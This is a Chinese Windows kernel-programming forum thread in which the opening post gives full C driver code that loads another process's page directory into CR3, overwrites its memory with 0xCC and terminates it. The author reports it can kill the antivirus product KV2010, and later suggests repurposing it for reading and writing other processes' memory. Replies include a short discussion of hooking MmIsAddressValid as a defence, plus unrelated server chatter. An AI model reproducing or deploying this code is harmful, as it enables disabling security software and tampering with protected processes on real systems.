论坛广场 › WINDOWS核心编程 › [半原创]另类内存清零 - HwlPVASE

HoviDelphic 发表于 2010-3-27 14:41:24

[半原创]另类内存清零 - HwlPVASE

本帖最后由 HoviDelphic 于 2010-4-10 23:10 编辑

貌似有不少人关注我的“另类内存清零”，其实原理很简单：
获得待结束进程的EPROCESS->获取EPROCESS+0x18的值（页目录值）->将页目录的值放到cr3中->内存清零->恢复cr3的值。
实现的代码：

NTSTATUS HwlPVASE( PEPROCESS ptrEProcess )
{
    ULONG ulPDT=0,ulOldCr3=0,vAddr=0;
    HANDLE hProcess=0;
    NTSTATUS st;
    //HdAttachProces
    if ( NT_SUCCESS(MmIsAddressValid((PVOID)((ULONG)ptrEProcess+0x18))) )
    {
      ulPDT=*(PULONG)((ULONG)ptrEProcess+0x18);
    }
    else
    {
      return STATUS_UNSUCCESSFUL;
    }
    _asm cli;
    _asm
    {
      mov eax, cr3;
      mov ulOldCr3, eax;
      mov eax, ulPDT;
      mov cr3, eax;
      sti;
    }
    //P.V.A.S.E
    for(vAddr=0;vAddr<=0x2000000;vAddr+=0x1000)
    {
      if(MmIsAddressValid((PVOID)vAddr))
      {
            _try
            {
                ProbeForWrite((PVOID)vAddr,PAGE_SIZE,PAGE_SIZE);
                memset((PVOID)vAddr,0xCC,PAGE_SIZE);
            }
            _except(1)
            {
                continue;
            }
      }
    }
    //HdDetachProces
    _asm
    {
      cli;
      mov eax, ulOldCr3;
      mov cr3, eax;
    }
    _asm sti;
    //Test Kill
    st=ObOpenObjectByPointer(ptrEProcess,0,0,0,0,0,&hProcess) ;
    if NT_SUCCESS(st)
    {
      ZwTerminateProcess(hProcess,0);
      ZwClose(hProcess);
    }
    return STATUS_SUCCESS;
}

此代码在Windows XP和Windows 7中测试通过，可以秒杀KV2010（不过要稍微修改一下代码）。

oopww 发表于 2010-3-27 15:06:56

话说前段时间论坛怎么进不了！！！

xiaoly99 发表于 2010-3-27 16:49:46

MmIsAddressValid 呵呵

马大哈 发表于 2010-3-27 18:13:25

话说前段时间论坛怎么进不了！！！
oopww 发表于 2010-3-27 15:06 http://www.m5home.com/bbs/images/common/back.gif

同服务器有个站点有不和谐内容,然后整个服务器都被封了80端口......

伟大的D比起以前要好得多了,至少这次没有直接搬服务器.....

同时谢谢关注:)

Tesla.Angela 发表于 2010-3-27 19:58:08

回复 4# 马大哈


    那你怎么不更换服务器？

xiaoly99 发表于 2010-3-28 19:08:38

if ( NT_SUCCESS(MmIsAddressValid((PVOID)((ULONG)ptrEProcess+0x18))) )这里用Hook MmIsAddressVaild就防住了
拦截这种东西只能Hook RtlCopyMemory但是判断PsGetCurrentProcess怎们判断呢?
在IOCTL中必须要在本进程中RtlCopyMemory啊 这样怎么办呢?

马大哈 发表于 2010-3-30 20:40:46

回复马大哈


    那你怎么不更换服务器？
Tesla.Angela 发表于 2010-3-27 19:58 http://www.m5home.com/bbs/images/common/back.gif

    这与换不换服务器有关,与运气有关....

只是运气不好,同服务器有别的站有不和谐内容而已....

我都在怀疑是不是最近RP降低的原因-_-b

本网站最菜的人 发表于 2010-4-3 22:31:35

HoviDelphic 发表于 2010-4-3 23:40:37

用这个东西来杀进程真是太不值得了，用来搞个Read/WriteProcMem才能真正发挥出它的价值。

oopww 发表于 2010-4-6 14:59:49

最近打开网站好慢啊！？？！？！！

everyone 发表于 2010-4-6 23:59:15

最近打开网站好慢啊！？？！？！！
oopww 发表于 2010-4-6 14:59 http://www.m5home.com/bbs/images/common/back.gif


    Ping了一下,IP是61.158.138.152,网通的啊?电信访问肯定会慢的.

hotnetbar 发表于 2011-2-13 14:28:42

用來讀寫內存好點

马大哈 发表于 2011-2-13 16:34:34

回复 everyone 的帖子

这个主机是双线主机,应该会自动切换IP的才对啊......我用了智能DNS的...

chenmo不行 发表于 2012-4-27 23:40:27

话说楼主很猥琐，喜欢这类变态的方式，原来楼主就是黑防上顶顶大名的胡文亮啊，崇拜崇拜，努力学好技术，希望也能在黑防上发表文章

Tesla.Angela 发表于 2012-4-28 23:20:57

chenmo不行 发表于 2012-4-27 23:40 static/image/common/back.gif
话说楼主很猥琐，喜欢这类变态的方式，原来楼主就是黑防上顶顶大名的胡文亮啊，崇拜崇拜，努力学好技术，希 ...

HoviDelphic是胡文亮以前的网名，现在的网名是Tesla.Angela。

查看完整版本: [半原创]另类内存清零 - HwlPVASE